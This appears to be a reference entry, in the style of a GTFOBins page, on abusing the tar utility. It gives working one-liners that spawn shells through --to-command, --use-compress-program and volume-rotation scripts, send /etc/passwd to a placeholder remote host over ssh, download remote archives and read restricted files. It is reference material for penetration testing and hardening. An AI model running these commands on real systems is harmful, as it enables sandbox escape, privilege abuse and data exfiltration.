It can be used to break out from restricted environments by spawning an interactive system shell.
The –to-command is normally used to pipe extracted files to a command. This can be used to run arbitrary commands on a host. The file must be a valid archive file.
tar xf /tmp/valid.tar --to-command='/bin/sh -c "sh <&2 1>&2"'Similar to the above, but at a previous stage in the extraction. A valid archive is not required. This functionality can be abused in various ways for file-read and file-write (see below).
tar xf /dev/null --use-compress-program='/bin/sh -c "sh <&2 1>&2"'GNU tar specifc. The -F / –info-script= / –new-volume-script= arguments will run a command at volume rotation. Other flags used are to force frequent rotation.
tar cf /dev/null --record-size=512 -L1 -F'/bin/sh -c "sh <&2 1>&2"' /tmp/It can exfiltrate files on the network.
This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).
tar cvf remote_user@remote_host.com:/tmp/remote_file.tar /etc/passwd --rsh-command=/bin/sshIt can download remote files.
GNU tar has remote archive capabilities, which can be used to download and extract remote archives. The remote machine should have the rmt utility installed and configured.
tar xvf remote_user@remote_host.com:/tmp/remote_file --rsh-command=/bin/sshIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
The –use-compress-program flag can be abused to read files.
tar xf /etc/passwd --use-compress-program='/bin/sh -c "echo hello > /tmp/file"'